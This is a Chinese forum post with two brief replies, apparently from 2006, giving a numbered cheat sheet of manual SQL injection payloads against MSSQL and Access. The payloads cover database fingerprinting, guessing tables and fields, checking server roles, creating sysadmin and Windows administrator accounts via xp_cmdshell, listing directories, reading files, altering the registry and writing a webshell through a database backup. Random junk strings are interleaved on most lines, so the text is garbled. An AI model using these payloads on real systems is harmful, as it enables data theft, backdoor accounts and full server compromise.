社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4152阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 #BLmT-cl  
  2.初步判断是否是mssql ;and user>0  VsR8|Hn$  
L^><APlX  
  3.注入参数是字符'and [查询条件] and ''=' DJ.n8hne  
M>LgEc-v67  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' bWEti}kW  
;I@@PUnR  
  5.判断数据库系统 RP|/rd]-k  
\#O}K  
  ;and (select count(*) from sysobjects)>0 mssql guc[du  
[ :*Jn}  
  ;and (select count(*) from msysobjects)>0 access 8AgKK=C =  
6xq/  
jSc!"Trl]  
vWpoaz/w  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 e$=UA%  
*s1^s;LR  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 BfUM+RC%5  
uS}qy-8J  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `j)S7KN  
L$rMfe S  
  9.(1)猜字段的ascii值(access) jS<(O o  
%f'mW2  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 E=eK(t(8  
noL&>G  
  (2)猜字段的ascii值(mssql) .XTR HL*:  
]~!?(d!J/  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Al-;-t#Dc  
PT/TQW  
  10.测试权限结构(mssql) '2X6 >6`w  
s. ]<r5v7  
n4%ZR~9WH  
(Xv' Te?  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 4SDUTRo a  
SSo7 U  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- vv0+F6 @  
Nt'6Y;m!  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- [3|&!:4g6  
rO3.%B}  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- -{O>'9'1A  
JVxGS{Z  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- +0Z,#b  
J,SP1-L  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- t]14bf$*Q  
IF~E;  
  ;and 1=(select IS_MEMBER('db_owner'));-- /; {E}`  
sDXD>upO  
vnr{Ekg  
ewrs D'?  
  11.添加mssql和系统的帐户 x,81#=m^h  
HY!R|  
  ;exec master.dbo.sp_addlogin username;-- ky#5G-X  
  ;exec master.dbo.sp_password null,username,password;-- K*id 1YY  
c+A$ [  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 4-voR5Fd  
]o+5$L,5b  
  ;exec master.dbo.xp_cmdshell 'net user username password G~ mLc  
p'f8?jt  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7H!/et?S,  
cN 3 !wE  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- hteAuz4H  
' Ih f|;r  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 0ub0 [A  
{'@`: p&3r  
a2%xW_e  
M)6iYA%$  
  12.(1)遍历目录 B9(@ .  
ic;M=dsh:  
  ;create table dirs(paths varchar(100), id int) 7U647G(Sg  
`p'682xI  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' +S6(Fvp  
"zZ Z h  
  ;and (select top 1 paths from dirs)>0 bGtS! 'I  
X 7R&>Pf  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *YO^+]nmY  
sD ,=_q@  
gzd<D}2F~  
Kg6[  
  (2)遍历目录 <{P`A%g@  
f1w_Cl  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- YG_|L[/#  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 PK).)5sW  
-qqI @+u+  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 G0~6A@>  
4..M *U  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [JVEKc ym  
!*e1F9k  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 qd<-{  
Lvd es.0|  
v2l*n  
cw3j&k  
  13.mssql中的存储过程 N@#,YnPI  
ItD&L ))  
  xp_regenumvalues 注册表根键, 子键 =n<Lbl(7  
oH='\M%+  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 zQ~ax!}R  
Ms 3Sri  
  xp_regread 根键,子键,键值名 zI,z<-  
 <BiSx  
  ;exec xp_regread /Os6i&;  
A9_} RJ9  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 JnIE6@g<y  
`n?Rxhkwp  
  xp_regwrite 根键,子键, 值名, 值类型, 值 e);`hNLih  
z_8lf_N  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Qg]+&8!*  
%k'>bmJ  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <&RpGAk%I  
\2))c@@%  
  xp_regdeletevalue 根键,子键,值名 $a'}7Q_  
RJ1 @ a  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 IOT-R!.5V  
4$+1&+@ ]  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 `?G&w.Vs  
,GF]+nI89  
;-AC}jG  
XR_Gsb%l  
  14.mssql的backup创建webshell 46##(4RF  
tj4/x7!  
  use model |=js!R|  
HtV8=.^  
  create table cmd(str image); N 9W,p 2  
rS8}(lf  
  insert into cmd(str) values (''); ykYef  
-v! ;  
  backup database model to disk='c:\l.asp'; Ye S5%?Fk  
zfw=U \  
qV0GpVJZU?  
:cvT/xhO  
  15.mssql内置函数 G=/^]E  
!oa/\p  
  ;and (select @@version)>0 获得Windows的版本号 Rt>mAU$}  
goe %'k,  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa $5:I~ -mx  
FsLd&$?T&  
  ;and (select user_name())>0 爆当前系统的连接用户 GL%)s?   
Ihp Ea,v)  
  ;and (select db_name())>0 得到当前连接的数据库 #&X5Di[A  
iNr&;  
,N1pww?  
~)pso7^:  
  16.简洁的webshell [,3E#+y  
q|V|Jl  
  use model iPdS>e e  
lAR1gHhJ  
  create table cmd(str image); V :/v r  
}9kn;rb$g  
  insert into cmd(str) values (''); p:V1VHT,  
=~k}XB  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八